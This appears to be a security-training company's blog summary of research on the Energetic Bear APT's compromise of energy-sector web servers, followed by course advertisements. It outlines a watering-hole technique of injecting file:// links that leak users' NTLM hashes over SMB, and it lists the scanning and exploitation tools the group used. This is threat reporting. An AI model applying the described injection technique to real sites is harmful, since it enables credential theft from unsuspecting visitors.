Cyber Attack of APT Group Hack Various Companies Web Servers Using Advanced Hacking Tools

Cyber attack

Cyber Attack

Cyber attack is any type of offensive maneuver that targets computer information systems, infrastructures, computer networks, or personal computer devices. A cyberattack could be employed by nation-states, individuals, groups, society or organizations. A cyber attack may originate from an anonymous source. A cyberattack may steal, alter, or destroy a specified target by hacking into a susceptible system.

In computers and computer networks an attack is any attempt to expose, alter, disable, destroy, steal or gain unauthorized access to or make unauthorized use of an Asset.

Cyber attack can be labelled as either a cyber campaign, cyberwarfare or cyberterrorism in different context. Cyber attack can range from installing spyware on a personal computer to attempt to destroy the infrastructure of entire nations. Cyber attack have become increasingly sophisticated and dangerous as the Stuxnet worm recently demonstrated.


Cyber attack


Cyber Attack of APT Group Hack Various Companies Web Servers Using Advanced Hacking Tools

A Well known APT group called Energetic Bear/Crouching Yeti attacked various companies servers with a strong focus on energy and industrial sectors around the World.

This cybercrime group attacking various companies webservers around the world using countless malware since 2010 and stolen a huge amount of sensitive data.

Mainly during 2016 and in early 2017, Energetic Bear group Compromising several webservers from the various organization.

The main task of these attack is to search and identify the vulnerabilities to gain the access to the various host and stealing the Authentication Data.

Cyber Criminals using phishing Emails with the malicious document to compromise the various servers and some of the compromised servers used for an auxiliary purpose that act as s host tools and logs.

Compromised server based on Russia, Ukraine, UK, Germany, Turkey, USA and other countries with the various role of Cyber Attack.


APT group


Water Whole Attack & Scanned Resources

An attacker using the Specific pattern to infect the water whole servers by injecting a link into a web page or JS file ( file://IP/filename.png.).

Particular injected link initially request for images but eventually, it makes user connected to the Command & control server over SMB to extract the following data from infected servers.


  • user IP,
  • username,
  • domain name,
  • NTLM hash of the user’s password.


Cyber Criminals using Various hacking Tools such as such as nmap, dirsearch, sqlmap, etc. to scan the vulnerable servers and compromised servers are used to conduct attacks on other resources.




Tools Used For Scanning by APT Group


According to Kaspersky Research, Most of the tools used found on compromised servers are open-source and publicly available on GitHub:


Nmap – an open-source utility for analyzing the network and verifying its security.

Dirsearch — a simple command-line tool for brute forcing (performing exhaustive searches of) directories and files on websites.

Sqlmap — an open-source penetration testing tool, which automates the process of identifying and exploiting SQL injection vulnerabilities and taking over database servers.

Sublist3r — a tool written in Python designed to enumerate website subdomains. The tool uses open-source intelligence (OSINT). Sublist3r supports many different search engines, such as Google, Yahoo, Bing, Baidu and Ask, as well as such services as Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS. The tool helps penetration testers to collect information on the subdomains of the domain they are researching.

Wpscan — a WordPress vulnerability scanner that uses the blackbox principle, i.e., works without access to the source code. It can be used to scan remote WordPress sites in search of security issues.

Impacket — a toolset for working with various network protocols, which is required by SMBTrap.

SMBTrap — a tool for logging data received over the SMB protocol (user IP address, user name, domain name, password NTLM hash).

Commix — a vulnerability search and command injection and exploitation tool written in Python.

Subbrute – a subdomain enumeration tool available for Python and Windows that uses an open name resolver as a proxy and does not send traffic to the target DNS server.

PHPMailer – a mail sending tool.

After they find the vulnerable servers then attackers try to bypass and inject the exploit to gain more access and pull out logs file and other sensitives data from compromised Victims.







Highest Selling Technical Courses of Indian Cyber Security Solutions:

Certified Ethical Hacker Training in Bhubaneswar

Ethical Hacking Training in Bhubaneswar

Certified Ethical Hacker Training in Bangalore

Ethical Hacking Training in Bangalore

Certified Ethical Hacker Training in Hyderabad

Ethical Hacking Training in Hyderabad

Python Training in Bangalore

Python Training in Hyderabad

Python Training in Bhubaneswar

Microsoft Azure Training in Hyderabad

Microsoft Azure Training in Bangalore

Microsoft Azure Training in Bhubaneswar

Networking Training in Bangalore

Networking Training in Hyderabad

Networking Training in Bhubaneswar

Advance Python Training in Hyderabad

Advance Python Training in Bangalore

Advance Python Training in Bhubaneswar

Amazon Web Services Training in Hyderabad

Amazon Web Services Training in Bangalore

Amazon Web Services Training in Bhubaneswar

Certified Ethical Hacker Certification – C | EH v10

Computer Forensic Training in Kolkata

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Testing training

Ethical Hacking  training

Internet Of Things Training

Internet Of Things Training Hyderabad

Embedded System Training

Digital Marketing Training

Machine Learning Training

Python Programming training

Android Training in Bangalore

Android Training in Hyderabad

Android Training in Bhubaneswar

Diploma in Network Security Training

Android Development  training

Secured Coding in Java

Certified Network Penetration Tester 

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 


Cybersecurity services that can protect your company:

Web Security | Web Penetration Testing

Network Penetration Testing – NPT

Android App Penetration Testing

Source Web Development

Source Code Review

Android App Development

Digital Marketing Consultancy

Data Recovery


Other Location for Online Courses: